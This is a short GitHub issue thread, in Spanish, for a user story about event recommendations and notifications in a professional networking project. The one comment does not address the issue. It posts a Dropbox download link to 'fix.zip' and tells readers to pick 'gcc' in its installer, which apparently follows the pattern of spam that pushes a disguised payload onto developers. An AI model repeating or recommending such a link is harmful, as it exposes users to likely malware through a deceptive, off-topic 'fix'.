### ISSUE TITLE
10. HU: Ver recomendaciones de eventos

### ISSUE THREAD

**Issue by Miguel107** [sacevedog2/netconnect#10]
Como usuario profesional, quiero ver recomendaciones de eventos basadas en mis intereses y actividad previa para descubrir eventos relevantes.
Condiciones de aceptación:
o	El sistema debe sugerir eventos relevantes basados en intereses comunes.
o	Las sugerencias deben ser notificadas al usuario por correo o dentro de la plataforma.

Tareas:
o	Desarrollar el algoritmo de sugerencias.
o	Integrar el sistema de notificaciones.
o	Realizar pruebas de efectividad del algoritmo.

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
